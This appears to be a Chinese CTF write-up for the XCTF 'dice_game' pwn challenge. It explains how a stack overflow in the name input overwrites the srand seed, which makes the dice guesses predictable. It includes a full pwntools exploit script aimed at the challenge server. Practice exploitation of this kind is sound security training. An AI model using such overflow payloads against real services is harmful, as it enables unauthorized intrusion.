說明

這其實是一種類型題,新手剛開始會碰到,題目大致過程是 有個srand()的隨機函數.需要覆蓋 seed種子

即srand(seed) 把 seed 覆蓋為一個固定的數 , srand 就是偽隨機函數了, 題目會有個猜數循

環,比如猜對了20次flag就有了,和這道題類似的題目還有新手區的guess_num

解題

點進去read中的 buf;

EXp

from pwn import * from ctypes import * p=remote('111.200.241.244','38298') libc = cdll.LoadLibrary("libc.so.6") p.recvuntil("Welcome, let me know your name: ") payload=0x40*"a"+p64(0) p.sendline(payload) libc.srand(0) for i in range(50):p.recvuntil("Give me the point(1~6): ")p.sendline(str(libc.rand()%6+1)) p.interactive()

這里EXP中的語句就不多解釋🔚了, 有問題留言即可,看見就會回的; 🌰

總結

以上是生活随笔為你收集整理的攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。